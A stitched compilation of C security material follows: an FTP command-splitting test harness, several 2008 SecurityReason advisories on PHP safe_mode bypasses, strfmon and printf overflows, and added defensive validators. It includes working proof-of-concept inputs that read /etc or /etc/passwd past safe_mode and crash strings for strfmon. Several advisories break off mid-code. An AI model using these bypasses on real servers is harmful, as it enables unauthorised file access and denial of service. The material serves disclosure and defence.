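#define CMDBUF 512      /* fixed command buffer; fgets() fills at most 511 bytes */

/* Outcome of a command loop over one client stream. */
struct loop_result {
    int dispatched;     /* commands handed to the dispatcher */
    int rejected;       /* over-long lines refused (ftpd would answer 500) */
    char last_verb[8];  /* verb of the last dispatched command */
};

/* Stand-in for ftpd's dispatcher: record the upper-cased leading verb. */
static void dispatch(struct loop_result *r, const char *line)
{
    size_t i = 0;
    while (i < sizeof r->last_verb - 1 && isalpha((unsigned char)line[i])) {
        r->last_verb[i] = (char)toupper((unsigned char)line[i]);
        i++;
    }
    r->last_verb[i] = '\0';
    r->dispatched++;
}

/* Vulnerable shape: for(;;) around fgets() into a fixed buffer. A line longer
 * than CMDBUF-1 bytes comes back in pieces and each piece is dispatched as
 * if the client had sent it as a separate command. */
struct loop_result read_commands_fgets(FILE *in)
{
    struct loop_result r = { 0, 0, "" };
    char buf[CMDBUF];
    for (;;) {
        if (fgets(buf, sizeof buf, in) == NULL)
            break;
        buf[strcspn(buf, "\r\n")] = '\0';
        dispatch(&r, buf);
    }
    return r;
}

/* Defensive shape: a chunk without '\n' means the line did not fit. Drain
 * the remainder and reject the whole line; nothing from it is dispatched. */
struct loop_result read_commands_strict(FILE *in)
{
    struct loop_result r = { 0, 0, "" };
    char buf[CMDBUF];
    for (;;) {
        if (fgets(buf, sizeof buf, in) == NULL)
            break;
        if (strchr(buf, '\n') == NULL) {
            int c;
            while ((c = fgetc(in)) != EOF && c != '\n')
                ;                               /* discard the rest of the line */
            r.rejected++;
            continue;
        }
        buf[strcspn(buf, "\r\n")] = '\0';
        dispatch(&r, buf);
    }
    return r;
}

/* Constructed client input: "CWD " + 507 x 'A' + "SYST\r\n" (517 bytes). */
static struct loop_result run_attack(struct loop_result (*reader)(FILE *))
{
    char line[4 + 507 + 6];
    memcpy(line, "CWD ", 4);
    memset(line + 4, 'A', 507);
    memcpy(line + 511, "SYST\r\n", 6);
    FILE *in = fmemopen(line, sizeof line, "r");
    struct loop_result r = reader(in);
    fclose(in);
    return r;
}

int naive_dispatched(void)
{
    struct loop_result r = run_attack(read_commands_fgets);
    return r.dispatched;                        /* 2: the CWD piece and SYST */
}

int naive_ran_syst(void)
{
    struct loop_result r = run_attack(read_commands_fgets);
    return strcmp(r.last_verb, "SYST") == 0;    /* 1: the tail ran as a command */
}

int strict_dispatched(void)
{
    struct loop_result r = run_attack(read_commands_strict);
    return r.dispatched;                        /* 0 */
}

int strict_rejected(void)
{
    struct loop_result r = run_attack(read_commands_strict);
    return r.rejected;                          /* 1 */
}

int main(void)
{
    printf("fgets loop: %d dispatched, SYST executed: %d\n",
           naive_dispatched(), naive_ran_syst());
    printf("strict loop: %d dispatched, %d over-long lines rejected\n",
           strict_dispatched(), strict_rejected());
    return 0;
}
```

The attacker's leverage is that a browser never lets the page choose the command verb, only the path; the split lets the bytes after the boundary start a fresh line, which is the FTP equivalent of request splitting.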
[Full-disclosure] libc/net inet_net_pton() integer overflow
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ WLB-2008080064: inet_net_pton() integer overflow ]

Author: Maksymilian Arciemowicz (cxib)
SecurityReason.com
Date:
- Written: 02.08.2008
- Public: 22.08.2008
SecurityRisk: Low

It is a bug without a high security risk. We are informing all vendors about this problem.

Affected Software: libc inet_net_pton.c, ISC BIND version
- OpenBSD: fixed

Original URL WLB-2008080064:
http://securityreason.com/wlb_show/WLB-2008080064
Vendor: http://www.isc.org/index.pl?/sw/bind/index.php

--- 0. Description ---

inet_net_pton - Internet network number manipulation routines

SYNOPSIS:
int inet_net_pton(int af, const char *src, void *dst, size_t size);

The inet_net_pton() function converts a presentation format Internet network number (that is, printable form as held in a character string) to network format (usually a struct in_addr or some other internal binary representation, in network byte order). It returns the number of bits (either computed based on the class, or specified with /CIDR), or -1 if a failure occurred (in which case errno will have been set. It will be set to ENOENT if the Internet network number was not valid).

Caution: The dst field should be zeroed before calling inet_net_pton() as the function will only fill the number of bytes necessary to encode the network number in network byte order. The only value for af currently supported is AF_INET. size is the size of the result buffer dst.

NETWORK NUMBERS (IP VERSION 4)

The external representation of Internet network numbers may be specified in one of the following forms:

	a
	a.b
	a.b.c
	a.b.c.d

Any of the above four forms may have ``/bits'' appended where ``bits'' is in the range 0-32 and is used to explicitly specify the number of bits in the network address. When ``/bits'' is not specified the number of bits

--- 1. libc/net inet_net_pton() integer overflow ---

The main problem exists in the inet_net_pton() function. Let's look at this function in inet_net_pton.c:

---
int
inet_net_pton(int af, const char *src, void *dst, size_t size)
{
	switch (af) {
	case AF_INET:
		return (inet_net_pton_ipv4(src, dst, size));
	default:
		errno = EAFNOSUPPORT;
		return (-1);
	}
}
---

It calls inet_net_pton_ipv4(). So let's look at that:

-START--
static int
inet_net_pton_ipv4(const char *src, u_char *dst, size_t size)
{
	static const char xdigits[] = "0123456789abcdef",
			  digits[] = "0123456789";
	int n, ch, tmp, dirty, bits;
	const u_char *odst = dst;

	ch = *src++;
	if (ch == '0' && (src[0] == 'x' || src[0] == 'X')
	    && isascii(src[1]) && isxdigit(src[1])) {
		/* Hexadecimal: Eat nybble string. */
		if (size <= 0)
			goto emsgsize;
		*dst = 0, dirty = 0;
		src++;	/* skip x or X. */
		while ((ch = *src++) != '\0' && isascii(ch) && isxdigit(ch)) {
			if (isupper(ch))
				ch = tolower(ch);
			n = strchr(xdigits, ch) - xdigits;
			assert(n >= 0 && n <= 15);
			*dst |= n;
			if (!dirty++)
				*dst <<= 4;
			else if (size-- > 0)
				*++dst = 0, dirty = 0;
			else
				goto emsgsize;
		}
		if (dirty)
			size--;
	} else if (isascii(ch) && isdigit(ch)) {
		/* Decimal: eat dotted digit string. */
		for (;;) {
			tmp = 0;
			do {
				n = strchr(digits, ch) - digits;
				assert(n >= 0 && n <= 9);
				tmp *= 10;
				tmp += n;
				if (tmp > 255)
					goto enoent;
			} while ((ch = *src++) != '\0' &&
				 isascii(ch) && isdigit(ch));
			if (size-- <= 0)
				goto emsgsize;
			*dst++ = (u_char) tmp;
			if (ch == '\0' || ch == '/')
				break;
			if (ch != '.')
				goto enoent;
			ch = *src++;
			if (!isascii(ch) || !isdigit(ch))
				goto enoent;
		}
[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.05.2008
- Public: 17.06.2008
SecurityReason Research SecurityAlert Id: 55
CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

chdir - Change directory
SYNOPSIS: bool chdir ( string $directory )
http://pl.php.net/manual/en/function.chdir.php

ftok - Convert a pathname and a project identifier to a System V IPC key
SYNOPSIS: int ftok ( string $pathname , string $proj )
http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH THE http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS.

--- 1. chdir(), ftok() (from standard ext) and more: safe_mode bypass ---

Let's look at the chdir() function:

---
PHP_FUNCTION(chdir)
{
	char *str;
	int ret, str_len;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
		RETURN_FALSE;
	}

	if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
		RETURN_FALSE;
	}
	ret = VCWD_CHDIR(str);

	if (ret != 0) {
		php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
		RETURN_FALSE;
	}

	RETURN_TRUE;
}
---

str is checked by safe_mode, for example:

---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
---

In the current directory we create a subdirectory named "http:". Then it is possible to call

	chdir("http://../../../../../../")

and we are in /. Why? For str = "http://../../../../../../" the check

	((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))

does not reject the path: safe_mode ignores all paths beginning with http://, while VCWD_CHDIR() treats "http:" as an ordinary directory name. The same situation exists with the ftok() function (and more).

---EXAMPLE1---
cxib# cat /www/wufff.php
<?php
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
---/EXAMPLE1---

---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?php
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH THE http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS.

--- 2. How to fix ---

Do not use safe_mode as the main safety mechanism.

--- 3. Greets ---

sp3x Infospec schain p_e_a Chujwamwdupe

--- 4. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-----END PGP SIGNATURE-----
[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass
[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com
Date:
- Written: 10.05.2008
- Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 54
CVE: CVE-2008-2665
CWE: CWE-264
SecurityRisk: Low
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/54
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

posix_access - Determine accessibility of a file
SYNOPSIS: bool posix_access ( string $file [, int $mode ] )
http://pl2.php.net/manual/pl/function.posix-access.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH THE http: PREFIX.
SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 1. PHP 5.2.6 posix_access() safe_mode bypass ---

Let's look at the posix_access() function:

---
PHP_FUNCTION(posix_access)
{
    long mode = 0;
    int filename_len, ret;
    char *filename, *path;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, &filename_len, &mode) == FAILURE) {
        RETURN_FALSE;
    }

    path = expand_filepath(filename, NULL TSRMLS_CC);
    if (!path) {
        POSIX_G(last_error) = EIO;
        RETURN_FALSE;
    }

    if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
            (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))) {
        efree(path);
        POSIX_G(last_error) = EPERM;
        RETURN_FALSE;
    }

    ret = access(path, mode);
    efree(path);

    if (ret) {
        POSIX_G(last_error) = errno;
        RETURN_FALSE;
    }

    RETURN_TRUE;
}
---

var_dump(posix_access("http://../../../etc/passwd")) == True
var_dump(posix_access("/etc/passwd")) == False

Why?
Because

path = expand_filepath(filename, NULL TSRMLS_CC);

changes "http://../../../etc/passwd" to path=/etc/passwd, while

(PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))

checks the raw path "http://../../../etc/passwd". The http:// prefix is what php_checkuid_ex() sees, so safe_mode is bypassed.

--- 2. How to Fix ---

Do not use safe_mode as your main safety mechanism.

--- 3. Greets ---

sp3x Infospec schain p_e_a Chujwamwdupe

--- 4. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
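The chdir() and posix_access() advisories above share one root cause: the authorisation check looks at the raw argument ("http://../../etc/") while the operating system acts on the path that argument resolves to. The added example below (our code, not PHP's or the advisory's; path_normalize, raw_string_check and canonical_check are hypothetical names) contrasts the flawed raw-string decision with the correct order of operations: normalise first, then authorise the normalised path. It also rejects embedded NUL bytes, the disagreement between C string functions and length-aware parsers that the cURL "file://...\x00" advisory further down relies on.

```c
#include <stdio.h>
#include <string.h>

/* Lexically resolve `input` against `cwd` (absolute), collapsing "." and "..",
 * into `out`. Purely lexical, like PHP's expand_filepath(): no filesystem
 * access. Returns 0 on success, -1 if the result does not fit. */
int path_normalize(const char *cwd, const char *input, char *out, size_t outsz)
{
    char joined[4096];
    const char *parts[512];
    size_t n = 0, used = 0;
    int w = (input[0] == '/') ? snprintf(joined, sizeof joined, "%s", input)
                              : snprintf(joined, sizeof joined, "%s/%s", cwd, input);
    if (w < 0 || (size_t)w >= sizeof joined)
        return -1;
    for (char *tok = strtok(joined, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (strcmp(tok, "..") == 0) {          /* ".." above "/" stays at "/" */
            if (n > 0)
                n--;
            continue;
        }
        if (n == sizeof parts / sizeof parts[0])
            return -1;
        parts[n++] = tok;
    }
    if (n == 0) {
        if (outsz < 2)
            return -1;
        strcpy(out, "/");
        return 0;
    }
    out[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        w = snprintf(out + used, outsz - used, "/%s", parts[i]);
        if (w < 0 || (size_t)w >= outsz - used)
            return -1;
        used += (size_t)w;
    }
    return 0;
}

/* Convenience for checks: does normalising (cwd, input) give `expected`? */
int normalize_eq(const char *cwd, const char *input, const char *expected)
{
    char buf[4096];
    return path_normalize(cwd, input, buf, sizeof buf) == 0 && strcmp(buf, expected) == 0;
}

/* True if `path` (already normalised) equals `base` or lies beneath it. */
int path_within_base(const char *base, const char *path)
{
    size_t blen = strlen(base);
    if (blen == 1 && base[0] == '/')
        return 1;
    return strncmp(path, base, blen) == 0 && (path[blen] == '\0' || path[blen] == '/');
}

/* The flawed pattern from the advisories: decide on the raw string. A value
 * that looks like a URL is treated as "not a local path" and waved through,
 * so "http://../../etc/" is never compared with the base directory. */
int raw_string_check(const char *base, const char *input)
{
    if (strncmp(input, "http://", 7) == 0)
        return 1;
    return path_within_base(base, input);
}

/* The corrected pattern: reject embedded NUL (where strlen() and a
 * length-aware parser would see two different paths), normalise the string
 * the OS will actually use, then authorise that. 1 = allow, 0 = deny. */
int canonical_check(const char *cwd, const char *base, const char *input, size_t len)
{
    char resolved[4096];
    if (memchr(input, '\0', len) != NULL)
        return 0;
    if (path_normalize(cwd, input, resolved, sizeof resolved) != 0)
        return 0;
    return path_within_base(base, resolved);
}
```

With cwd and base both /www, the raw check lets "http://../../etc/" through while the canonical check resolves it to /etc and denies it.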
[Full-disclosure] [securityreason] *BSD libc (strfmon) Multiple vulnerabilities
[ *BSD libc (strfmon) Multiple vulnerabilities ]

Author: Maksymilian Arciemowicz (cxib)
SecurityReason.com
Date:
- Written: 10.03.2008
- Public: 25.03.2008

SecurityReason Research
SecurityAlert Id: 53
CVE: CVE-2008-1391
SecurityRisk: High
Affected Software:
  FreeBSD lines: 6, 7
  NetBSD 4
  other systems that use this function
  Standard C Library (libc, -lc) for BSD
  probably some MacOS versions
Advisory URL: http://securityreason.com/achievement_securityalert/53
Vendor: http://www.php.net

--- 0. Description ---

strfmon -- convert monetary value to string

The strfmon() function places characters into the array pointed to by s as controlled by the string pointed to by format. No more than maxsize bytes are placed into the array.

The format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the output stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each conversion specification is introduced by the % character.

SYNOPSIS:
#include <monetary.h>
ssize_t strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...);

--- 1. /usr/src/lib/libc/stdlib/strfmon.c - Integer Overflow ---

The main problem and vulnerability exist in the strfmon() function. When we use this function in an example program:

---example-start--
#include <stdio.h>
#include <monetary.h>

int main(int argc, char* argv[]){
    char buff[51];
    char *bux=buff;
    int res;
    res=strfmon(bux, 50, argv[1], "0");
    return 0;
}
---example-end--

and compile it, we can manipulate the format string. Let's try to run the example:

cxib# ./pln %n
Segmentation fault (core dumped)

What is wrong? Let's see:

cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %n
Starting program: /cxib/C/pln %n
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)

memmove() does a bad memory reallocation.
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %.99n
Starting program: /cxib/C/pln %.99n
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7

The next example is:

cxib# ./pln %#n

Long execution time. Let's check this process:

--
cxib# ps -aux | grep pln
cxib  1843 89.1 13.2 140320 119588  p2  R+  4:29PM  0:09.68 ./pln %#n
cxib# ps -aux | grep pln
cxib  1843 94.7 48.4 482336 438236  p2  R+  4:29PM  1:54.07 ./pln %#n

1 VSZ=140320
2 VSZ=482336
--

Why? pln will allocate more memory than we have.

PHP uses strfmon() in the money_format() function. When we use mod_php5 in Apache, we can create an example exploit. The result will be:

---apache-child-die---
swap_pager: out of swap space
swap_pager_getswapspace(16): failed
Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap space
---apache-child-die---

The difference between %n and (%#n or %.99n) is "#" or ".":

o A `#' sign followed by a decimal number specifying the maximum expected number of digits after the radix character.
o A `.' character followed by a decimal number specifying the number of digits after the radix character.

Let's see the source of the strfmon() function:

---strfmon()-start---
ssize_t
strfmon(char * __restrict s, size_t maxsize, const char * __restrict format, ...)
{
    va_list ap;
    char        *dst;           /* output destination pointer */
    const char  *fmt;           /* current format position pointer */
    struct lconv *lc;           /* pointer to lconv structure */
    char        *asciivalue;    /* formatted double pointer */

    int         flags;          /* formatting options */
    int         pad_char;       /* padding character */
    int         pad_size;       /* pad size */
    int         width;          /* field width */
    int         left_prec;      /* left precision */
    int         right_prec;     /* right precision */
    double      value;          /* just value */
    char        space_char = ' '; /* space after currency */

    char        cs_precedes,    /* values gathered from struct lconv */
                sep_by_space,
                sign_posn,
                *signstr,
                *currency_symbol;

    char        *tmpptr;        /* temporary vars */
    int
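The three crashes above all come from attacker-chosen text reaching strfmon() as its format argument, the same path that PHP's money_format() exposes to web input. The format should be a fixed string; where one has to be accepted from configuration, an allow-list validator such as this added example (our code, not libc's or the advisory's; strfmon_fmt_ok and strfmon_checked are our names, and the width/precision bounds are our choice) rejects anything outside the strfmon grammar before the call, including the three inputs shown above.

```c
#define _XOPEN_SOURCE 700
#include <ctype.h>
#include <monetary.h>
#include <stddef.h>
#include <sys/types.h>

#define FMT_MAX_WIDTH 64   /* largest field width we are willing to honour (our choice) */
#define FMT_MAX_PREC  32   /* largest "#n" / ".n" precision (our choice) */

/* Parse a decimal number at *p, advancing *p. Returns the value, or -1 if
 * there is no digit at all or the value exceeds `limit`. */
static int parse_bounded_num(const char **p, int limit)
{
    int v = 0;
    if (!isdigit((unsigned char)**p))
        return -1;
    while (isdigit((unsigned char)**p)) {
        v = v * 10 + (**p - '0');
        if (v > limit)
            return -1;
        (*p)++;
    }
    return v;
}

/* Returns 1 if `fmt` is made only of ordinary characters and complete
 * strfmon conversions (%i, %n, %%) with optional flags (=f ^ + ( ! -),
 * a bounded width, and "#" / "." precisions that actually carry a number. */
int strfmon_fmt_ok(const char *fmt)
{
    const char *p = fmt;
    while (*p) {
        if (*p++ != '%')
            continue;                          /* ordinary character */
        if (*p == '%') { p++; continue; }      /* literal "%%" */
        for (;;) {                             /* flags */
            if (*p == '=') {                   /* "=f": a fill character follows */
                if (p[1] == '\0')
                    return 0;
                p += 2;
            } else if (*p == '^' || *p == '+' || *p == '(' || *p == '!' || *p == '-') {
                p++;
            } else {
                break;
            }
        }
        if (isdigit((unsigned char)*p) && parse_bounded_num(&p, FMT_MAX_WIDTH) < 0)
            return 0;                          /* field width too large */
        if (*p == '#') {                       /* left precision: digits required */
            p++;
            if (parse_bounded_num(&p, FMT_MAX_PREC) < 0)
                return 0;
        }
        if (*p == '.') {                       /* right precision: digits required */
            p++;
            if (parse_bounded_num(&p, FMT_MAX_PREC) < 0)
                return 0;
        }
        if (*p != 'i' && *p != 'n')
            return 0;                          /* unknown or missing conversion */
        p++;
    }
    return 1;
}

/* strfmon() guarded by the validator: -1 without touching the buffer when the
 * format is rejected, otherwise strfmon()'s own return value. */
ssize_t strfmon_checked(char *s, size_t maxsize, const char *fmt, double value)
{
    if (!strfmon_fmt_ok(fmt))
        return -1;
    return strfmon(s, maxsize, fmt, value);
}

static char demo_buf[64];   /* scratch output buffer for the guarded call */
```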
[Full-disclosure] {securityreason.com}PHP 5 *printf() - Integer Overflow
[PHP 5.2.5 and prior: *printf() functions Integer Overflow]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com and SecurityReason.pl
Date:
- Written: 01.03.2008
- Public: 20.03.2008

SecurityReason Research
SecurityAlert Id: 52
CVE: CVE-2008-1384
SecurityRisk: Low
Affected Software: PHP 5.2.5 and prior
Advisory URL: http://securityreason.com/achievement_securityalert/52
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

These functions all manipulate strings in various ways. Some more specialized sections can be found in the regular expression and URL handling sections. For information on how strings behave, especially with regard to usage of single quotes, double quotes, and escape sequences, see the Strings entry in the Types section of the manual.

--- 1. *printf() functions Integer Overflow ---

The main problem exists in the formatted_print.c file.

cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008     [EMAIL PROTECTED]:/usr/obj/usr/src/sys/GENERIC  i386
cxib# php -v
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
cxib# cat /www/printf.php
cxib# php /www/printf.php
Segmentation fault (core dumped)

Good.
Let's look at the formatted_print.c file, in the php_sprintf_appendstring() function:

---formatted_print.c-start---
inline static void
php_sprintf_appendstring(char **buffer, int *pos, int *size, char *add,
                         int min_width, int max_width, char padding,
                         int alignment, int len, int neg, int expprec, int always_sign)
---formatted_print.c-end---

The main variable we will look at is "npad":

---formatted_print.c-start---
    copy_len = (expprec ? MIN(max_width, len) : len);
    npad = min_width - copy_len;
---formatted_print.c-end---

Good. npad is 2147483646.

---formatted_print.c-start---
    req_size = *pos + MAX(min_width, copy_len) + 1;
---formatted_print.c-end---

req_size overflows.

---formatted_print.c-start---
    if (req_size > *size) {
        while (req_size > *size) {
            *size <<= 1;
        }
        PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n", *size));
        *buffer = erealloc(*buffer, *size);
    }
---formatted_print.c-end---

(req_size > *size) is False.
(alignment == ALIGN_RIGHT) is True, so:

---formatted_print.c-start---
        while (npad-- > 0) {
            (*buffer)[(*pos)++] = padding;
        }
---formatted_print.c-end---

and finish. Let's debug it with gdb:

--- Debug ---
0x08295ba5 in php_sprintf_appendstring (buffer=0xbfbfd318, pos=0xbfbfd31c, size=0xbfbfd324, add=0x28f20404 'A' ..., min_width=2147483646, max_width=0, padding=65 'A', alignment=1, len=1, neg=0, expprec=0, always_sign=0)
..
0x290fff0c: 'A' ...
0x290fffd4: 'A'
0x2910:
--- Debug ---

The script will allocate a lot of data in memory.

Tested on:

PHP 5.2.5
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008     [EMAIL PROTECTED]:/usr/obj/usr/src/sys/GENERIC  i386

and PHP 5.1.6
[EMAIL PROTECTED] ~ $ uname -a
NetBSD ultra 3.0.1 NetBSD 3.0.1 (GENERIC) #0: Fri Jul 14 03:47:28 UTC 2006  [EMAIL PROTECTED]:/home/builds/ab/netbsd-3-0-1-RELEASE/sparc64/200607131826Z-obj/home/builds/ab/netbsd-3-0-1-RELEASE/src/sys/arch/sparc64/compile/GENERIC sparc64

--- 2.
Exploit ---

SecurityReason will not publish an official exploit for this issue.

--- 3. How to fix ---

CVS
http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1120&view=markup

--- 4. Greets ---

sp3x Infospec p_e_a Chujwamwdupe schain
and Stanislav Malyshev (Patch)

--- 5. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg [NEW KEY]
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg.old [OLD KEY]
http://securityreason.com
http://securityreason.pl
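The chain described in the advisory turns on one int computation wrapping: once req_size goes negative, the "grow the buffer" branch is skipped and the padding loop writes past the allocation. As an added example (our code, not PHP's; the function names and the use of 64-bit arithmetic are our choices), here is the same size calculation and growth loop with overflow detection, plus the unsigned value the unchecked expression yields for the debugger's min_width of 2147483646:

```c
#include <limits.h>

#define MAX_OF(a, b) ((a) > (b) ? (a) : (b))

/* Required buffer length for appending, i.e. pos + MAX(min_width, copy_len) + 1
 * as in php_sprintf_appendstring(), but computed in 64-bit and refused when it
 * does not fit an int. Returns the size, or -1 on overflow or bad input. */
int checked_req_size(int pos, int min_width, int copy_len)
{
    if (pos < 0 || min_width < 0 || copy_len < 0)
        return -1;
    long long need = (long long)pos + MAX_OF(min_width, copy_len) + 1;
    if (need > INT_MAX)
        return -1;
    return (int)need;
}

/* The "while (req_size > *size) *size <<= 1" growth loop with a bound:
 * returns the new size, or -1 if the next doubling would leave the int range
 * (the original shifts an int without any such check). */
int checked_grow(int size, int req)
{
    if (size <= 0 || req < 0)
        return -1;
    while (size < req) {
        if (size > INT_MAX / 2)
            return -1;
        size *= 2;
    }
    return size;
}

/* What the unchecked int expression produces for the advisory's values, done
 * in unsigned arithmetic so the demonstration itself has no undefined
 * behaviour. Any result above INT_MAX would be read back as a negative int,
 * so the original test (req_size > *size) is false and no erealloc happens. */
unsigned int wrapped_req_size(int pos, int min_width, int copy_len)
{
    return (unsigned int)pos + (unsigned int)MAX_OF(min_width, copy_len) + 1u;
}
```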
[Full-disclosure] PHP 5.2.5 cURL safe_mode bypass
[PHP 5.2.5 cURL safe_mode bypass]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- Written: 21.08.2007
- Public: 22.01.2008

SecurityReason Research
SecurityAlert Id: 51
CVE: CVE-2007-4850
SecurityRisk: Medium
Affected Software: PHP 5.2.4 and 5.2.5
Advisory URL: http://securityreason.com/achievement_securityalert/51
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication.

These functions have been added in PHP 4.0.2.

--- 1. cURL ---

This is very similar to CVE-2006-2563.
http://securityreason.com/achievement_securityalert/39

The first issue [SAFE_MODE bypass]

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));

is caused by an error in curl/interface.c:

---
#define PHP_CURL_CHECK_OPEN_BASEDIR(str, len, __ret) \
    if (((PG(open_basedir) && *PG(open_basedir)) || PG(safe_mode)) && \
        strncasecmp(str, "file:", sizeof("file:") - 1) == 0) \
    { \
        php_url *tmp_url; \
        \
        if (!(tmp_url = php_url_parse_ex(str, len))) { \
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid URL '%s'", str); \
            php_curl_ret(__ret); \
        } \
        \
        if (!php_memnstr(str, tmp_url->path, strlen(tmp_url->path), str + len)) { \
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL '%s' contains unencoded control characters", str); \
            php_url_free(tmp_url); \
            php_curl_ret(__ret); \
        } \
        \
